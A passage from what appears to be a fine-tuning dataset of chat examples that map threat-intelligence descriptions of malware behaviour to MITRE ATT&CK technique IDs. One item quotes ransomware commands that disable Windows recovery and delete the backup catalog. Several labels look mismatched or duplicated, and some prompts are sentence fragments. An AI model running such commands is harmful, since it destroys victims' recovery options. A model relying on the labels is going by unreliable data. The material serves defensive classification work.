}, { "role": "user", "content": "Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access." }, { "role": "assistant", "content": "T1090.001 - Proxy: Internal Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic can obtain a list of directories." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anchor and older versions of Anchor_DNS implement the exact same self deletion routine using two sets of commands to ensure that the dropper is deleted once the malware was successfully deployed" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity can use multiple layers of proxy servers to hide terminal nodes in its infrastructure." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DownPaper collects the victim host name and serial number, and then sends the information to the C2 server." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to download a file from the C2 server to the victim mobile device's SD card." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 has a number of modules that leverage pass the hash for lateral movement." }, { "role": "assistant", "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PolyglotDuke can write encrypted JSON configuration files to the Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To use Google Drive, the x_mode command received from the C2 server via DNS tunneling will be followed by a newline-delimited list of settings needed to interact with the Google Drive account" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Drovorub has used XOR encrypted payloads in WebSocket client to server messages." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ComRAT has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday)." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Octopus has used wmic.exe for local discovery information." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used batch scripts to enumerate users in the victim environment." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 has compromised domains to use for C2." }, { "role": "assistant", "content": "T1584.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLINDINGCAN has obfuscated code using Base64 encoding." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WMIC (wmic.exe) was used to create a remote command prompt instance (cmd.exe), which then executed the PowerShell code. The PowerShell command created two variables and attempted to download and execute the payload from one of FIN8’s Command and Control (C&C) servers. This download was blocked by Bitdefender – below description is based on interpretation of variables discovered in our previous analysis of FIN8 operations" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1105 - Ingress Tool Transfer', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Heyoka Backdoor can gather process information." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proton zips up files before exfiltrating them." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has used SMB to copy files to and from target systems." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ultimately, the XLS writes two files to disk, one of which -- the BAT -- immediately modifies some system settings and creates two scheduled tasks. However, this behaviour may not be enough to determine the components as malicious. Only after 20 minutes will the task scheduler execute the VBS downloader component and launch the BackConfig loader EXE, by which time analysis systems may have stopped monitoring" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Night Dragon has obtained and used tools such as gsecdump." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload decryption routine uses a custom symmetric algorithm based on arithmetic and byte-shift instructions – a combination of SHL/SHR/SUB/ADD/XOR – with hardcoded keys" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can use the \"ITaskService\", \"ITaskDefinition\" and \"ITaskSettings\" COM interfaces to schedule a task." }, { "role": "assistant", "content": "T1559.001 - Component Object Model" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JPIN checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper is capable of enumerating the running processes on the system using \"pslist\"." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM has used Powershell to download UltraVNC and Ngrok from third-party file sharing sites." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exfiltrated data is encrypted using an RSA public key, preventing third parties from decrypting it. An example exfiltration request is below" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nefilim also uses bcdedit.exe twice to disable automatic Windows recovery features by modifying boot configuration data. bcdedit /set {default} recoveryenabled No bcdedit /set {default} bootstatuspolicy ignoreallfailures Moreover, the Nefilim ransomware uses wbadmin to delete the backup catalog: wbadmin delete catalog -quiet" }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use MSHTA to serve additional payloads." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook has a command built in to use a raw TCP socket." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POSHSPY uploads data in 2048-byte chunks." }, { "role": "assistant", "content": "T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used process hollowing in iexplore.exe to load the implant." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obtains a list of running processes on the victim." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FormBook authors did some rewrites on the original exploit, taking as their initial codebase the one that we and Microsoft observed as deploying Cobalt Strike beacons.  The exploited vulnerability is CVE-2021-40444. However, since the vulnerability itself has been analyzed already, here we focus on describing some of the unique changes made by FormBook." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can downloaded payloads from C2 to the compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay can use a file exfiltration tool to collect recently changed files with specific extensions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "H1N1 has functionality to copy itself to removable media." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Winnti for Windows dropper can place malicious payloads on targeted systems." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FlawedGrace encrypts its C2 configuration files with AES in CBC mode." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FlawedAmmyy can capture screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kasidet has the ability to change firewall settings to allow a plug-in to be downloaded." }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Linfo creates a backdoor through which remote attackers can retrieve system information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses AES to encrypt certain information sent over its C2 channel." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT uses Base64 encoding for C2 traffic." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following network activity observed from msiexec.exe illustrates how the malware leveraged a signed and verified certification from Sectigo RSA Code Signing CA to propagate" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell is injected into a shared SVCHOST process." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldMax has written AES-encrypted and Base64-encoded configuration files to disk." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoomBox can enumerate the hostname, domain, and IP of a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "dropped and executed tools used for password cracking, including Hydra." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources." }, { "role": "assistant", "content": "T1217 - Browser Bookmark Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Action RAT can use `cmd.exe` to execute commands on an infected host." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell has a feature to create local user accounts." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThreatNeedle can decrypt its payload using RC4, AES, or one-byte XORing." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware supports timestomping." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq creates a backdoor through which remote attackers can load and call DLL functions." }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first thread is responsible for taking a screenshot of the desktop of the victim machine. This screenshot data is both compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At the time of discovery TEARDROP was a novel concoction: never-before-seen, possibly even tailor-made for this attack. TEARDROP runs in-memory but it does register a Windows service, which involves editing the registry" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore can execute JavaScript by injecting it into the victim's browser." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As a Windows Management Instrumentation (WMI) client application, it initializes COM and connects to the \\\\root\\cimv2 namespace to use the IWbemServices pointer and make WMI requests. The code executes wql queries (“wql” is “sql for wmi”, a subset of sql) to gather victim host details, like the query “SELECT Description, Manufacturer, Name, ProcessorId FROM Win32_Processor”. Here are several queries from the BlackEnergy2 plugin code" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The discovery modules used with can collect information on process details." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can delete folders and files including overwriting its executable with legitimate programs." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Neoichor can clear the browser history on a compromised host by changing the `ClearBrowsingHistoryOnExit` value to 1 in the `HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Privacy` Registry key." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nltest may be used to enumerate trusted domains by using commands such as \"nltest /domain_trusts\"." }, { "role": "assistant", "content": "T1482 - Domain Trust Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At this time, Janicab is not detected by most anti-virus software, and it slips right past the built-in defenses of Mac OS X in the hands of an unobservant or unsavvy user. Further, seeing other malware using a signed app is troubling, as it may indicate that Gatekeeper will not offer as much security as had been hoped for" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pteranodon executes functions using rundll32.exe." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Get Microsoft Version Number from the registry, specifically from reg key/value: HKEY_CLASSES_ROOT\\Excel.Application\\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at: HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1" }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Excel\\Security\\AccessVBOM\\\" to determine if the security setting for restricting default programmatic access is enabled." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Higaisa used \"cmd.exe\" for execution." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CreepySnail can connect to C2 for data exfiltration." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk has been observed to query the registry key \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\" and the value \"InstallLanguage\". If the machine has the value 0x419 (Russian), 0x422 (Ukrainian), or 0x423 (Belarusian), it stops execution." }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TClient will use SSL to connect to Tropic Trooper’s C&C server. This allows Tropic Trooper’s operators to easily change/update the C&C server and configure other values" }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca used Base64 to encode strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mori can resolve networking APIs from strings that are ADD-encrypted." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has used legitimate applications to side-load malicious DLLs." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak C2 traffic returns data as encoded ASCII text that is decoded on the victim host and saved as malware items like script files, EXE used during the infection and data for registry updates for the Valak infection" }, { "role": "assistant", "content": "T1564.004 - Hide Artifacts: NTFS File Attributes', 'T1132.001 - Data Encoding: Standard Encoding', 'T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "C2 traffic is encrypted using bitwise NOT and XOR operations." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hancitor has relied upon users clicking on a malicious link delivered through phishing." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DDKONG downloads and uploads files on the victim’s machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The downloaded Stage3 is written in C# as in Stage2, and an obfuscation tool called Eazfuscator is detected by exeinfoPE" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling has the ability to capture screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KillDisk, along with the multipurpose, cyberespionage-related BlackEnergy, was used in cyberattacks in late December 2015 against Ukraine’s energy sector as well as its banking, rail, and mining industries. The malware has since metamorphosed into a threat used for digital extortion, affecting Windows and Linux platforms" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The TrickBot module used for credential harvesting is pwgrab64. As with all modules launched by the TrickBot core, pwgrab64 is installed into a subfolder, usually 